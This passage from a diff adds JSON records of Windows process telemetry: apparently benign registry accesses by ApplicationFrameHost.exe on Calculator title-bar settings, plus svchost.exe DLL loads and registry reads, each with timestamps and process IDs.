"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + 
"registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": 
"ButtonHoverBackgroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManagerClient.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": 
"ButtonBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251200016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + 
